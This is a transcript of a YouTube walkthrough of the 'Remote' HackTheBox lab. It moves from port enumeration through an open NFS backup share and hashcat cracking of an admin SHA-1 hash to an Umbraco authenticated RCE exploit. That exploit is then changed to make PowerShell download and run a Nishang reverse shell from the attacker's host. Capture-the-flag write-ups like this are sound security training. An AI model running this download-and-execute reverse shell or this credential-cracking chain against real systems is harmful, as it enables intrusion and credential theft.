Hey YouTube, what's going on? I'm Rocket, and this is part 1 of my Remote HackTheBox walkthrough. Overall, I found this box to be pretty straightforward. All you need to do is pretty much enumerate very thoroughly. Don't overlook any port or service. If you find a port or service that you are not familiar with, please go look it up, learn it, understand how it works, and figure out how to interact with it. Also, once you get access to a service, make sure to enumerate for the fundamentals. Don't overcomplicate things. You don't need to learn everything there is about the application. You just need to look for ways to get you to your goal. In this case, the goal is getting a user own or root own on the box. So that would be looking for passwords, sensitive information, other credentials, private keys, etc. However, there was also part of this box that I didn't like, and that was when I was trying to log into the web application as the web app's admin user. I ended up cracking a password, and that happened to be the admin's password. I tried using it to log in, and it gave me login failed. And the reason why was because somebody changed the password. So I went ahead and reverted the box and entered the same password, got in. So whenever you crack the password and it doesn't let you log in, just try reverting the box. It might work. Someone might have just changed the password on you because this is a shared environment. And yeah, just keep that in mind. So anyways, enough of me rambling. Let's get right to it. So first off, I like to run a nmap self-syn scan, so I'll just say sudo nmap -p- to enumerate all TCP ports, -oa to output all formats, nmap, and we'll just say all TCP. And the host is remote.htb. I have already ran this command, so let's go check the output below. It does look like this is a Windows host. I can deduct that immediately because I see MSRPC on port 135, NetBIOS on port 139, and SMB on port 445. I also notice WinRM, which is on port 5985. WinRM is a port that you can use to log in remotely via PowerShell to the host. And well, what do we have here? We also have another WinRM port. And all these other ports are just RPC. Anyways, I still like to run all default nmat scripts and enumerate for all service versions, so I'm just going to copy this list right here and delimit every port by a comma. So I'm just going to use a vim macro right here. So qd qd to start recording the macro, and then I'll hit E to move it to the end of the cursor to the end of the word, hit L to move the cursor left one, Shift D to delete everything from there, J to go down, I to go to the very back, escape to go back into normal mode, Q to stop recording, and then at D, which is where I recorded my macro in, to repeat all those keystrokes from before, and then 100, and then the at symbol twice to repeat that same macro 100 times. So next, at this point, we are going to replace every new line with a comma. And you can use this using sed syntax in Vim, using the %s, and then just replacing every new line with a comma. G is for global, so it replaces every occurrence of a new line with a comma. Simple enough. So we get this nice list right here. We'll copy it, and we're going to run another nmat scan. So sudo nmap -p. We're going to specify the supports this time, -sc, and then to enumerate, s-sc to run nmap default scripts, and -sv to enumerate for all service versions. OA again to output all formats, nmap all TCP version. The host is remote.htb, and I have also already ran this command. If you are curious why I ran 2 nmap commands like this in sequence, that's because if you just run sudo nmap -p- and you enumerate for all service versions and you run all default nmat scripts, that's going to take a really long time to scan. What we're doing in this first command here, we're just doing a half TCP connect on every single port, which is relatively fast. And then we find the ports that are open that way. And with the ports that are open, those are the only ports that we really care about. And on the ports that we really care about, that's where we can just go deep and thoroughly enumerate those. So that's why I do it 2 separate commands, if you're curious. Anyways, let's go check the output. So here, it looks like we do have an anonymous login in the Microsoft FTP server. That's definitely going to be something we're going to look at. We have a web server in port 80. We have RPC, and the fun fact about RPC, if you find RPC and NFS together, you might be able to anonymously connect to a remote network, a remote share on the network. So that will also be something we'll be looking at. I didn't say too much else about WinRM. So yeah, let's find what I like to do here is just go enumerate the ports that I know the most about. So in this case, SMB is pretty straightforward. NetBIOS, FTP, and HTTP. So let's start with FTP. So make a directory called FTP, go into it. We'll run FTP remote.htp. My login is just going to be anonymous because I don't have any login credentials. And you can just put no password. So we're logged in. ls, and there's nothing right here. pwd to check what our current directory is. Nothing too interesting there. The next thing I like to check for in FTP, especially when it's anonymous authentication, is to see if you can write there. And the reason for this is if you have especially if you have a web server running, you might be able to put a PHP file there, and if the web server is running PHP, you might just get remote code execution that way and just backdoor your way into the system. An easy one-punch KO. So I'm going to create a file. I'm going to call it bar. I'm going to dump foo to bar, and we're just going to upload it. So put bar, and we don't have write access, so access is denied. So that tells me our FTP's adventure for now are finished. We might look at it later, but that's enough for now. All right. So next off is SMB. We're gonna go in there, and we're gonna try authenticating with an SMB null session. And we can do this with SMB client, and we'll just specify the -L to list shares. You can also provide a -N for a null session, and we'll do it on remote.htp. And we get access denied. There's nothing there. For those of you curious if you get access denied with one SMB tool, you might want to try another one. So we'll try SMB map. We'll put a user, we'll say null, and then password is also null, and -h for the host, remote.htp. I spelled that wrong, my bad. And we get authentication error again. So to me, it's pretty clear that null sessions are not allowed on this host. There's one last thing that we can do though, and that's just fingerprinting. You can actually fingerprint the operating system version with SMB using crackmap exec. So I'm gonna do that right now. So I'm gonna run crackmap exec. I have it alias to CME because it's just shorter to type. SMB, and then the host is remote.htp. And we can see that this is a pretty up-to-date Windows build. We do get the build version, which could be useful later on if we want to, let's say, look for kernel exploits when we already have a foothold in the system. So, little cool tip right there. All right, now let's try seeing if we can authenticate with NetBIOS RPC calls. So to do that, we can run RPC client -u with no user to run a null session. Remote.htp. We'll put no password, and we also get access denied right there as well. So we can check SMB and NetBIOS off our list as well for now. And now let's check the web server. So I'm gonna make a directory called web. And for this, I'm going to spin up Burp Suite. I always like to have Burp Suite running in the background while looking at web applications because there's a lot of hidden information there that might fly by your eye if you're not examining it very closely, and Burp Suite is great for that. All right, start Burp, load up Firefox. Make sure we proxy everything through Burp, and make sure that we have our intercept off. Remote.htp. It says, welcome to Acme. Allow me to introduce myself. My name is Wile E. Coyote Genius. I am not selling anything, nor am I working my way through college. So, whenever I see a web app like this, you want to search for the fundamentals. So, contact information and secrets, possibly. And possibly just you might want to check to see if it's a web application that happens to have common vulnerabilities for it, where you can just get a one-punch KO and get right onto the box. So, let's look for the one-punch KO. Control U, look at the source. And then I like to search for things like version. I don't see anything right here. maybe if we scroll up, we might find what kind of technology this is using. We see something to do with Umbraco. That might be relevant later on. And scrolling down, we don't see too much here. We see a lot of to-dos. When you do see to-dos, keep in mind that that could be a half-baked feature. It's still experimental. And when features are still in experimental mode, they are often riddled with security vulnerabilities and issues. But we're looking for low-hanging fruit, really easy stuff to pick at. So we're just going to put this on the back of our list for now. Let's check out the products page. You might see some jackets right here. So this might tell us, hey, this application might be interacting with some sort of database. Could we do SQL injection? If we do SQL injection, you can potentially get remote code execution. And the buy button doesn't work. So that's odd. We could also check in burp to see if we sent any GET requests here. And to me, it looks like when you go to products, there's the name of the product. So, and it also looks very REST API-ish. But there is probably nothing there. Might be worth looking at later though. But for now, we're trying to focus on simple things. So we go to people. And here we find some people. So what I would do here is we'd take these names and make a list of them for later. So let's just do that. So we'll take this. I'll just call users.text, paste. We'll take that guy, this guy here. Should probably just copy all of it like that. Alright. Cool, so we have our list of users. So if we want to perform any sort of like phishing attacks or social engineering attacks, we could try it against these guys right here. Interestingly enough, only this guy has a Twitter and an Instagram handle, so we could get more information about Matt Brailsford here. Let me turn off burp for a second. So, interestingly enough, this guy is a certified Umbraco master. He's also an Umbraco MVP, and which might make him a target to attack if they're using anything Umbraco related, because he could be an Umbraco admin. So let's take note of that. Users, Matt Brailsford will say Umbraco MVP. Cool. All right. Moving on, let's go to About Us. And we don't really see anything interesting right there. So let's try going to Contact. Send us a message. And then here it says, go to back office and install forms. Umbraco Forms is required to render this form. It's a breeze to install. All you have to do is go to the Umbraco Forms section in the back of the office and click install. That's it. So install is actually a good keyword to look for, because if you can go install something, you can potentially introduce a backdoor in your installation and then get remote code execution on the host. So let's go here. We need a username and a password, but the catch is your username is usually your email. We don't have any emails right now. We might be able to do some more passive recon on some people like Matt Brailsford right here and try to get hold of his email, but that seems kind of out of scope of the Hack the Box realm, in my opinion. So going back to the drawing board, we can go ask ourselves, what have we not enumerated yet? What kind of ports or services have we not looked at? Well, for one, we haven't really looked at any UDP ports. For two, there was an NFS port, which we should definitely look at. So let's go to the Nmap scan again. We'll go all TCP version.mmap. And the one we care about is this port right here, 24.9, which is NFS, a network file system. And we can check NFS for anonymous shares that we can access. So let's go dir NFS, and then we can run a command like show mount and then -e and the host, which is remote.htb. And this will give us the list of drives we can possibly mount on our host. So in this case, there is a site backups that everyone is allowed access to, and we should be able to mount that on our local Kali machine to access the file system on the remote host. That'd be pretty good. Maybe it relates to Umbraco. Let's try it out. So let's go make a directory. We'll just call it mnt for mount. We'll go sudo mount remote.htb : and then / site backups. Oh, and by the way, backups are always a treasure trove for secret credentials, because quite often system administrators, they'll take passwords, secrets, database backups, and just do a backup of all of that sensitive information, and then the backup will have less restricted access than the actual production environment. So backups, always something good to look for. Anyways, let's mount this to mnt. And let's go here, do an ls, and it looks like we have some hits. All right, so now we need to start thinking simple. What is our goal? What is our objective right here? Well, we are looking for emails so that we can get a username, and then we want a password associated with that email so we can log into the web application and hopefully try to exploit it, or upload a file and get remote code execution, or do some other nefarious thing. Basically, we just want to get more access. All right, so I'm gonna go look in app data right here, because we want usernames and passwords, and that's clearly data. So let's go there, app data, do an ls, and we might want to look at the config file. So we can run a grep -i and search for anything password related. So here I like to say pwd, maybe passwd, or maybe password. I put various combinations of these because in configuration files, it is helpful to search for abbreviations as well, because you have more information to search. All right, so Umbraco. I'm also going to specify the -- color so we can see the output a bit better. And there's nothing interesting right here. Another cool thing we can look for is secret. Maybe private, so maybe priv. And maybe email. Maybe user. And nothing there either. Interestingly enough, we do see Matt Brailsford here with this Twitter username, so that might indicate that the page that we saw earlier was just a static page. All right, so where's the database? Well, here we see something called Umbraco called .sdf. And for those of you who don't know, an SDF is a portable SQL Server database. Great. While I was doing this box, I wasn't able to open this right here. So if you figure out how to do that, please let me know in the comments below. I would really like that. But what I did here is, since I'm on Linux, I like to look for strings, because why not? It's quick and dirty, simple. So we'll run strings on Umbraco, and then we can grep for, well, we can just run it through less, just to get a quick overview to see what's going to face us here. And just right off the bat, we do see something that looks like an email. So here we have something like admin@htb.local. We have something like smith@htb.local. So at this point, we've already got 2 emails that are part of the Umbraco database. This is very promising, especially since this here is an Umbraco web application that we're trying to log into. We also notice a hash beside it, and it also tells us the hash algorithm, which is very convenient. And it is SHA-1 for the admin. Smith looks a little different. It looks like some base64 encoded HMAC SHA-256, which frankly is probably a bit more difficult to crack. Still not impossible, still doable I think, but I think SHA-1 just by itself like this is a much easier candidate to crack, and plus, why not get admin? Highest privileges, let's just go for that. So from here, I'm gonna go copy this hash right here, and I'm going to put it, I'm gonna try to crack it in my cracking station over here. So I'm on my cracking machine. I'm going to go to hashes, make a directory called remote, go to remote, and I'm just going to create, I'm just going to dump this hash into a file. I'm just call it hashes.sha1. Open up in Visual Studio Code, dump it, save it, and now I'm going to switch back to my Linux machine for a sec here. We need to figure out how to operate hashcat, which is the tool to use for cracking these passwords, in order to crack a SHA-256, sorry, a SHA-1 hash. So we can just say hashcat example hashes, and then grep I for case insensitive, -c to give context. So 3 lines of context above and below every search result we find with grep. And we want to look for a SHA-1. Cool. So we have a lot of advanced operations like ASCrypt, in-memory, SHA-1, this right here, and there's a lot of other stuff a lot of different SHA-1 combinations, or variants I should say. So let's go to the very top, and we see the simplest kind of SHA-1 hash, which happens to be 40 characters. So you can verify this by doing echo-n, paste the hash, and then wc-c to give a word count of what you echoed. There's 40 characters. Our hash that we got, was also 40 characters, if I recall correctly. We go here, and we say echo-n, and then paste that hash, wc-c, we also have 40 characters. So the mode is definitely 100 right here. So now that we know the mode, now that we know how to configure hashcat, let's just go and crack this password. Go to the left screen. So to do this, I'm gonna go back here, execute hashcat. I'm on Windows, and the reason why I'm running this on my host OS is because I want to take advantage of hashcat's GPU capabilities to crack passwords faster. That's all. hashcat64.exe -a0, specify our mode, which was 100 as we saw earlier. Give our hashes file, so that's remote, actually sorry, it was hashes remote, and then hashes.sha1, and then we need to provide a word list, because with every hash, like a hash is a one-way mathematical operation. So let me show you kind of how that works right here. So if I were to say something like, let's say the password is password, and when you store a password in a database, you always like generally speaking, almost every application will end up hashing it. And we say, let's say SHA-1 sum, we get this right here. If we change something here, let's say change the O to a 0, clearly we get something different. However, there is no way to revert the hash back to this. The only way to get this is by providing the one-way input through this mathematical operation here, and you get this output. So that's why we need to provide a word list, because we're going to produce millions of these hashes, and when we get a match, then that means we have cracked the password. Hopefully that made sense. Kind of explained that really fast. But anyways, let's go crack the password. So here we have we need to provide a word list. I like to use the Rocky word list. I recommend using the Rocky word list for every sort of CTF-like box that you find, because it's just a huge list of really weak passwords that you can crack. Obviously, if you're doing a real engagement, you might want to get some passive information on the company you're doing a pen test for and collect all these relevant words, permute them, combine them with different rules, and use that as your word list instead. Anyways, let's run this. So, alright, so that didn't take too long. That cracked pretty much instantly. As we can see, we did end up using our GPU right here. And we ended up cracking the password, which happens to be bacon and cheese. So let's just copy that and see if we can't log in as the admin user here. So password, bacon and cheese, and username is admin@htb.local. We'll log in. And the server is being pretty slow. Okay, so we got in. I was kind of worried there. The first time I tried that, someone changed the password on me and I got invalid credentials and I was just like stuck scratching my head. Anyways, there's some Umbraco forms. Kind of odd. If we click install right here, it will not download because the HackTheBox network is firewalled from the internet. So even if you were on an actual engagement, you'd want to make sure that you don't modify too many things, and if you do, that you have permission to in your contract, because it's technically an invasive operation per se. Just a little quick tip there. And whenever I see something like this, I'm like, okay, this looks like the web application that has a lot of thought in it, and they patch security bugs because they have been disclosed to them. So what does that mean? Well, let's check the version. Go to help. We can see that the version is Umbraco 7.12.4. If you have the version, you can use that to see if there are any common vulnerabilities available for this web application that can potentially give you remote code execution. So, that said, let's check for some common vulnerabilities. I like to use searchsploit. Searchsploit is a local mirror of the exploit DB database. So we'll say searchsploit, and it was Umbraco. And it looks like for Umbraco CMS 7.12.4, we have authenticated remote code execution. That looks very promising. So let's mirror this. I'm going to go back up a couple directories. I'm going to make a directory called exploit, and I'm going to say searchsploit-m to mirror, and then take the script. Yeah, and we have our script right here. Almost every exploit is in DOS format, so I like to edit them as Unix files. So I'll just say DOS to Unix, convert to Unix format. I think the difference between DOS and Unix format here is one file is separated by carriage return line feeds, whereas Unix format is only, the lines are just separated by just line feeds. Anyways, it makes it easier to edit in Vim for me right here. So let's open it up, and it looks like we have a payload right here, and this payload executes a calculator. Too bad we're not interested in executing a calculator. We want a shell on the box. So the file name is calc.exe. We need a login, a password, and the host. So let's just get the login down. I think it was admin@htb.local, if I recall correctly. The password was bacon and cheese, and the host was remote.htb. So instead of running calc.exe, let's try running the ping command to see if we can even get remote code execution, because if we end up pinging ourselves and let's say the page doesn't give any sort of visual feedback, we know that it pinged us because it ended up executing the ping command that we told it to. So we'll say ping, and it looks like there are some command arguments as well. So there's cmd right here, proc start info arguments. So ping arguments, this is kind of poorly named in my opinion, should be called args, but instead of cmd. Anyhow, we'll say ping-n1, and then my host, which is 10.10.14.48. Cool. So I'm going to set up a TCP dump listener to see if we get pinged. So say sudo TCP dump dash I to listen on the interface. In this case, ton0 is my VPN interface, and ICMP. Alright. So let's try executing this payload. Say Python. I think it's Python 2. And we end up erroring out. Why is this? Well, invalid URL, no schema provided. Perhaps you meant http://remote.htb Umbraco. All right, so let's see where we messed up right here. So we tried connecting to remote.htp/Umbraco, but this is what we actually meant. So let's go fix that. So URL main, we're using the Python request library, which sends HTTP requests. They're using the session instance right here so that once you authenticate, you can maintain cookies in there. Just a little quick tip. And you send to get on the URL. So clearly our URL is created by host and then followed by the remaining path. So we need to say http://remote.htb. So this should work. Let's try again. Didn't seem to ping us. So we might have goofed something right here. Maybe we'll try listening on any. Let's try this again. Huh. That's odd. Maybe it was ping.exe. Oh. Wait a sec. I typoed this. It's supposed to be local, not local. Okay. Alright, and this should work on the ton0 interface. Alright, let's see if that works. Aha, okay. Sorry for the mess up right there, but it looks like we do have remote code execution. We can see that remote.htb did end up pinging us. So we need to weaponize this now. And to do that, we need to get a reverse shell. We do know that this is a Windows host. So we are going to download a PowerShell reverse shell and then execute it. So let's edit this. We're gonna provide a command right here. Instead of saying ping, we're gonna say something like PowerShell.exe, and our command is going to be something different. So I'm just going to put 2 pluses right here because I'm going to append a value. I'm just going to call this PowerShell args. So PowerShell args is, well, we'll just say IEX to invoke expression, new object, system.net dot web client dot download string, and then we'll provide our IP address right here, which is HTTP 10.10.14.48 port 8000, because we're going to host a Python web server to host our reverse shell, and we'll just call it rocket rsh.ps1 for rocket reverse shell ps1. All right, that looks good to me. The next thing we need to do is mirror our reverse shell. So I have mirrored the Nishang PowerShell post exploitation framework. You can look them up on GitHub. So I'll go to, I'll go to my tools directory, Let me move this up here. And go to Nishang, and then go to shells. And here we have the invoke PowerShell TCP reverse shell, which we can copy. So we'll just say CP and tools, Nishang, shells, this, and we'll just call it rocket rsh.ps1. Now let's edit it. And as soon as the remote host downloads the script, it's going to end up executing it. So right now we just have the function declaration, but we need to execute the function. So to do that, we need to copy this line right here because we want it to connect back to us with a reverse connection. Go all the way to the bottom and then paste this line. Oops, I did not copy that line as I intended to. Copy that. Copy this line. And we're going to connect to our IP address, which is again 10.10.14.48. And I like to go on port 2001. Simple enough. The next thing, we need to host a web server for this. So I'll just say python 3-m for module, http.server, and it automatically listens on port 8000. Next off, I need to set up a netcat listener. So you can say rl wrap, and I'm running rl wrap around netcat so that I can move my cursor back and forth once I get a reverse shell and go back up in command history and also recursively search command history. Very convenient. So rl wrap ncat nvlp and port 2001. All right, so let's execute this payload and pray to get a reverse shell. So we'll say python 46153.py, run it. Our reverse shell got downloaded, executed, and we have a reverse shell on the host. Amazing. All right, so from here, let's see if we can get the user flag. So we'll go to the C drive where users are, do an ls. We'll go to public because it looks like we are a service right here. Do an ls. And there is the user flag. Awesome. So I hope you enjoyed part 1 of this video. Stay tuned for part 2 where we'll be escalating our privileges to system. See ya.